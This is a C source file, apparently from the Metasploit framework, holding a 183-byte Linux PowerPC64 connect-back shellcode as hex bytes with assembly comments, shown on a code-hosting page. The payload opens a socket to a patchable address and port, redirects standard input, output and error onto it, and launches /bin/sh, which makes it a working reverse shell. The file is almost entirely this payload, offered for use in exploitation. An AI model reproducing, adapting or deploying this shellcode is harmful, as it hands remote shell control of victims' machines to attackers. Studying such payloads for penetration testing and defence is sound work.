Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/unixasm/lin-power-cntsockcode64.c
Views: 11766
/*1* lin-power-cntsockcode64.c2* Copyright 2008 Ramon de Carvalho Valle <[email protected]>3*4* This library is free software; you can redistribute it and/or5* modify it under the terms of the GNU Lesser General Public6* License as published by the Free Software Foundation; either7* version 2.1 of the License, or (at your option) any later version.8*9* This library is distributed in the hope that it will be useful,10* but WITHOUT ANY WARRANTY; without even the implied warranty of11* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU12* Lesser General Public License for more details.13*14* You should have received a copy of the GNU Lesser General Public15* License along with this library; if not, write to the Free Software16* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA17*18*/1920#define CNTSOCKADDR1 5421#define CNTSOCKADDR2 5822#define CNTSOCKPORT 622324char cntsockcode64[]= /* 183 bytes */25"\x7f\xff\xfa\x78" /* xor r31,r31,r31 */26"\x3b\xa0\x01\xff" /* li r29,511 */27"\x3b\x9d\xfe\x02" /* addi r28,r29,-510 */28"\x3b\x7d\xfe\x03" /* addi r27,r29,-509 */29"\xfb\xe1\xff\xf9" /* stdu r31,-8(r1) */30"\xfb\x81\xff\xf9" /* stdu r28,-8(r1) */31"\xfb\x61\xff\xf9" /* stdu r27,-8(r1) */32"\x7c\x24\x0b\x78" /* mr r4,r1 */33"\x38\x7d\xfe\x02" /* addi r3,r29,-510 */34"\x38\x1d\xfe\x67" /* addi r0,r29,-409 */35"\x44\xff\xff\x02" /* sc */36"\x7c\x7a\x1b\x78" /* mr r26,r3 */37"\x3b\x3d\xfe\x11" /* addi r25,r29,-495 */38"\x3e\xe0\x7f\x00" /* lis r23,32512 */39"\x62\xf7\x00\x01" /* ori r23,r23,1 */40"\x3a\xc0\x04\xd2" /* li r22,1234 */41"\x96\xe1\xff\xfc" /* stwu r23,-4(r1) */42"\x96\xc1\xff\xfc" /* stwu r22,-4(r1) */43"\x93\x61\xff\xfe" /* stw r27,-2(r1) */44"\x7c\x35\x0b\x78" /* mr r21,r1 */45"\xfb\x21\xff\xf9" /* stdu r25,-8(r1) */46"\xfa\xa1\xff\xf9" /* stdu r21,-8(r1) */47"\xfb\x41\xff\xf9" /* stdu r26,-8(r1) */48"\x7c\x24\x0b\x78" /* mr r4,r1 */49"\x38\x7d\xfe\x04" /* addi r3,r29,-508 */50"\x38\x1d\xfe\x67" /* addi r0,r29,-409 */51"\x44\xff\xff\x02" /* sc */52"\x7f\x64\xdb\x78" /* mr r4,r27 */53"\x7f\x43\xd3\x78" /* mr r3,r26 */54"\x38\x1d\xfe\x40" /* addi r0,r29,-448 */55"\x44\xff\xff\x02" /* sc */56"\x37\x7b\xff\xff" /* addic. r27,r27,-1 */57"\x40\x80\xff\xec" /* bge+ <cntsockcode64+108> */58"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */59"\x40\x82\xff\xfd" /* bnel+ <cntsockcode64+132> */60"\x7f\xc8\x02\xa6" /* mflr r30 */61"\x3b\xde\x01\xff" /* addi r30,r30,511 */62"\x38\x7e\xfe\x25" /* addi r3,r30,-475 */63"\x98\xbe\xfe\x2c" /* stb r5,-468(r30) */64"\xf8\xa1\xff\xf9" /* stdu r5,-8(r1) */65"\xf8\x61\xff\xf9" /* stdu r3,-8(r1) */66"\x7c\x24\x0b\x78" /* mr r4,r1 */67"\x38\x1d\xfe\x0c" /* addi r0,r29,-500 */68"\x44\xff\xff\x02" /* sc */69"/bin/sh"70;71727374